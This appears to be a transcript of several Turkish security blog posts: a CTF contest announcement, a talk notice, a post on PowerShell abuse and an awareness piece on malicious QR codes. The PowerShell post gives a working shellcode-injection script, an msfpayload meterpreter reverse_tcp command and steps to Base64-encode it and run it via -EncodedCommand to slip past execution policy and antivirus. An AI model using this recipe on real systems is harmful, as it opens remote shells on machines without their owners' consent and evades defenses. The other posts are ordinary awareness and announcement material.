Siber Savaş Yarışması

Transkript

1 Siber Savaş Yarışması Dünyayı Kurtaran Hacker adlı siber savaş oyunu Aralık 2012 tarihleri arasında başlıyor. An itibariyle 760 kişinin başvurduğu bu oyuna katılarak hem bilgi ve becerinizi sınayabilir hem de dereceye girerek bu yolda ilerlemek isteyenler için iyi bir fırsat olabilir. Yarışmaya buradan katılabilirsiniz. Bol Şanslar AMAÇ Yarışmanın amacı Türkiye de siber güvenliğin önemini duyurmak ve bu konuda yetenekli gençlerimizi bir araya getirmektir. Yarışma 16 Aralık saat 19:00 da başlayıp, 21 Aralık 00:00 tarihinde sona erecektir. Katılımcılara siber güvenlik ile ilgili analitik düşünme teknik bilgi gerektiren 25 adet görev verilecektir. Görevlerin tümü yarışma başlangıcında üzerinden açıklanacaktır. KURALLAR Verilen 25 adet görev birbirinden bağımsızdır. Bu nedenle katılımcılar istediği görevden başlayabilir. Her görevin puanı görevin sayfasında belirtilecektir. Görevler zorluk derecesine göre 100, 200, 300, 400 ve 500 olmak üzere puanlandırılmıştır. Görevi başarı ile tamamladığınızda karşınıza bir cevap çıkacaktır. (Örnek: busorununcevab1buymu5.) Görevin cevabını Cevap Yolla kısmından gönderebilirsiniz. Eğer yanıtınız doğru ise 1 dakika içerisinde puan tablosu güncellenecektir. Her görevin tek bir cevabı vardır. Bu nedenle yoruma açık cevaplar veya çözüm yöntemine puan vermek mümkün olmamaktadır. Aşağıdaki durumlarda yarışmacı diskalifiye edilir: Yarışmanın sitesinde açık bulmaya çalışmak veya işleyişini engellemek Yarışmada geçen görevlerin bulunduğu sunuculara saldırı yapmak veya isleyişini engellemek Yarışma sunucularında önemli dosyaları silmek Otomatik tarayıcı programları kullanmak Yüksek trafik yaratacak araçlar kullanmak.

2 Diğer yarışmacıları engellemeye yönelik tüm davranışlar GÖREV KONULARI Analitik düşünce gerektiren birçok problem İmaj ve müzik içerisinden bilgi toplama Ağ verilerini analiz etme Android sistemleri analiz etme Şifre kırma Web sitesi açıklıkları Kablosuz ağ güvenliği Log analizi Tersine mühendislik Exploiting Bilişim ve Kariyer 2012 Eskişehir Osmangazi Üniversitesi Matematik ve Bilgisayar Kulübü nün davetlisi olarak 15 Aralık 2012 tarihinde saat 10:30 da Prof. Dr. Fazıl TEKİN Konferans Salonunda Ethical Hacking konulu bir sunum gerçekleştireceğim, meraklılarına duyurulur :)

3

4 Komut Satırının Gücü Adına! Yapılan istatistiklere göre 2011 yılının son çeyreğinde Windows XP işletim sistemi ile Windows 7 işletim sistemi arasındaki kullanım oranları birbirine oldukça yakınken, 2012 yılının son çeyreğinde Windows 7 işletim sistemi kullanım oranının Windows XP işletim sistemi kullanım oranını ikiye katlamış olması, penetrasyon testi/sızma testi gerçekleştiren bilişim güvenliği uzmanları arasında tek bir nedenden ötürü memnuniyetle karşılandı o da Windows 7 ile yüklü gelen Powershell den başkası değildi. Powershell, Mircosoft tarafından yönetim görevlerini otomatize etmek amacıyla geliştirilmiş,.net sınıflarından faydalanarak betikler (script) geliştirilmesine imkan tanıyan yeni nesil komut satırıdır. İlk sürümü 2006 yılında Microsoft tarafından yayınlanan Powershell in ikinci sürümü 2009 yılında Windows 7 ve Windows 2008 işletim sistemlerine entegre edilmiş üçüncü sürümü ise Windows 8 ve Windows Server 2012 işletim sistemlerine entegre edilerek kullanıcıların kullanımına sunulmuştur. Powershell, güvenlik önlemi adına güvenilir kaynaklar tarafından geliştirilmemiş olan betiklerin çalıştırılmasına varsayılan (default) olarak izin vermez. Kurumsal ortamlarda da daha önce Powershell in gücüne tanıklık etmiş olan Sistem Yöneticileri çoğunlukla Etki Alanı Denetleyicisi (DC) üzerinden Powershell in güvenilir olmayan kaynaklardan indirilen betiklerin çalıştırılmasını yasaklamaktadırlar. Ancak ve ancak sistem yöneticileri de dahil çoğu son kullanıcı bu betiklerin Command ve EncodedCommand (Base64 ile kodlanmış (encode) betik) ile de

5 çalıştırıldığından haberdar değildir. Normal şartlarda betik çalıştırmaya izin vermeyen politikalar Command ve EncodedCommand ile atlatılabilmektedir. Powershell in betiklerde.net sınıflarını kullanmaya imkan tanıması, C# ile yazılmış bir kod parçasını çalıştırma (runtime) esnasında derlemesi ve çalıştırması sayesinde örneğin komut enjeksiyonu (command injection) zafiyeti olan bir Windows Server 2008 işletim sisteminin komut satırına uzaktan erişmek (remote shell) veya basit şifre tahmini ile sızılan bir Windows 7 işletim sisteminin Metasploit e bağlanmasını sağlamak mümkündür. En önemlisi ise Powershell sayesinde Antivirüs yazılımının kullanıldığı bir sistemde Antivirüs e yakalanmadan istenilen kabuk kodu çalıştırabilmektedir. Örnek olarak Powershell üzerinden kabuk kodu çalıştırmak için Matt Graeber tarafından geliştirilen aşağıdaki betiği kullanabilirsiniz. $code = {$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpaddress, uint dwsize, uint flallocationtype, uint flprotect);[dllimport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpthreadattributes, uint dwstacksize, IntPtr lpstartaddress, IntPtr lpparameter, uint dwcreationflags, IntPtr lpthreadid);[dllimport("msvcrt.dll")]public static extern IntPtr memset(intptr dest, uint src, uint count);';$winfunc = Add-Type memberdefinition $code -Name "Win32" -namespace Win32Functions passthru;[byte[]];[byte[]]$sc64 = ;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.length -gt 0x1000) {$size = $sc.length};$x=$winfunc::virtualalloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.length-1);$i++) {$winfunc::memset([intptr]($x.toint32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };} Betiğin çalışabilmesi için $sc64 değişkenine hedef işlemci mimarisine uygun olan (x32 veya x64) kabuk kodunu kopyalamanız gerekmektedir. $sc64 değişkenine atanacak kabuk kodunu aşağıdaki şekilde oluşturabilirsiniz.

6 msfpayload windows/x64/meterpreter/reverse_tcp LHOST= PORT=4444 EXITFUNC=thread C sed '1,6d;s/[";]//g;s/\\/,0/g' tr -d '\n' cut -c2- sed 's/^[^0]*\(0.*\/\*\).*/\1/' sed 's/.\{2\}$//' tr -d '\n' more Ardından betik bloğunu Powershell komut satırına kopyaladıktan sonra Base64 ile kodlamak için [convert]::tobase64string([text.encoding]::unicode.getbytes($code)) kodunu çalıştırmanız gerekmektedir. Son olarak Backtrack de hazır bulunan Meterpreter ile hedef sistemi bağlamak için az önce elde ettiğiniz BASE64 ile kodlanmış betiği hedef sistemde powershell -EncodedCommand şeklinde çalıştırarak Meterpreter ın Antivirüs yüklü hedef sistemde başarıyla çalışmasını sağlayabilirsiniz. Sonuç olarak Powershell üstün özelliklerinin yanı sıra mevcut güvenlik kontrollerinin yetersiz olması nedeniyle kötüye kullanıma açık olduğu için

7 kullanımına ihtiyaç duyulmayan sistemlerden kaldırılmasını tavsiye ederim. Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim. Blog'um 3 Yaşında :) 19 Kasım 2009 tarihinde açmış olduğum blogum bugün itibariyle 3. yılını doldurmuş bulunuyor. 3 yıl içinde göstermiş olduğunuz ilgi, alaka ve olumlu geri dönüşleriniz için teşekkür eder, nice yazılarla tekrar görüşmek dileğiyle herkese güvenli günler dilerim Çabuk Tepki Vermeyin Quick Response Code (QR Code) Türkçe meali ile Çabuk Tepki Kodu, 1994 yılında Toyota nın iştiraki olan Japon Denso firması tarafından üretim bandında parça takibi amacıyla geliştirilmiş iki boyutlu barkod türüdür. QR Kodunun veri kapasitesi, nümerik olarak en fazla karakter, alfanümerik olarak en fazla karakter, ikilik sistem (8 Bit) olarak en fazla bayt, Kanji/Kana olarak ise en fazla karakterdir. (Veri kapasitesi seçilen sürüme ve hata düzeltimine göre değişiklik gösterebilir.) Günümüzde hemen hemen her akıllı cihazda (cep telefonları, tabletler vb.) barkod okuyucu uygulaması olması nedeniyle barkodlar, başta reklam sektörü olmak üzere hizmet sektörü, gıda sektörü, yazılım sektörü ve bankacılık sektörü gibi birçok sektör tarafından çeşitli amaçlar (web sitesi reklamı, uygulama indirme, sanal alışveriş vs.) için kullanılmaktadır. Örneğin bundan 7 ay önce Astoria Alışveriş Merkezinde karşılaştığım devasa QR koduna bakacak olursanız Mekanist mobil uygulamasını yükletmek amacıyla kullanıldığını görebilirsiniz.

8

9 Bir diğer örnek olarak ise farklı hizmetler sunmak ve dünyada bir ilk olmak için birbirleriyle yarışan risk iştahları yüksek bankalarımızın çeşitli yöntemler ile (salla yolla, sosyal ağdan bankacılık) gerçekleştirdikleri bankacılık işlemlerini benimsemeye çalışırken diğer bir bankamızın ATM den QR kod ile kredi kartsız para çekmeye imkan tanıyarak dünyada bir ilke imza attığını görebilirsiniz.

10 Günümüzde QR kodların hemen hemen her alanda sıkça kullanılıyor olması ve cep

11 telefonumuz ile her gördüğümüz barkodu taramaya başlıyor olmamız aslında sosyal mühendislik saldırılarına da davetiye çıkarmaktadır. Çoğu zaman akıllı cep telefonlarında da birer işletim sistemi çalıştığını ve bu işletim sistemlerinin de aynı Windows ve Linux işletim sistemleri gibi zafiyetlere sahip olduğunu ancak bu işletim sistemlerinden farklı olarak güvenlik yamalarının kolayca yüklenemediğini göz ardı etmekteyiz. Durum böyle olunca da cep telefonlarımızın QR kodlar da dahil olmak üzere çeşitli yollar ile istismar edilme olasılığı artmaktadır. Örneğin ios ve Android işletim sistemlerinde bulunan Webkit internet tarayıcısı motorunda keşfedilen zafiyetlerin sadece bir web sitesini ziyaret ederek istismar edilebildiği haberlerini daha önce okumuştuk. Mekanist örneğinde olduğu gibi barkod okuyucu uygulaması ile QR kod taratan ve uygulama indirip kurmaya alışan bir kullanıcının art niyetli kişilerce hazırlanan bir QR kodu okutması ve ardından zararlı uygulamayı cep telefonuna kurma olasılığı yüksektir çünkü QR kodları hazırlayan kişilerin/firmaların doğruluğunun teyit edilmesi mümkün değildir. Veya banka örneğinde olduğu gibi ATM de QR kod taramaya alışan bir kullanıcının art niyetli kişilerce hazırlanan ve ATM lere yapıştırılan bir QR kodu okutması, art niyetli kişilerin kontrolünde olan bir web sitesini ziyaret etmesi ve bu site üzerinde bulunan zararlı uygulamayı cep telefonuna istem dışı yüklemesi mümkün olabilir. Özetle QR kod taramaya teşvik edildiğimiz bugünlerde güvenliğiniz için kaynağından emin olmadığınız QR kodları taramamanız, taramanız durumunda da özellikle kısaltılmış URL içeren adresleri ziyaret etmemeniz şiddetle tavsiye edilir aksi halde art niyetli kişilerin cep telefonunuza erişmesi ve kişisel bilgilerinize ele geçirmesi mümkün olabilir. Herhangi bir QR kodu taramadan önce QR kod oluşturulmasının basit ve anonim olarak gerçekleştirilebilen bir işlem olduğunu asla unutmayın.

12 Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.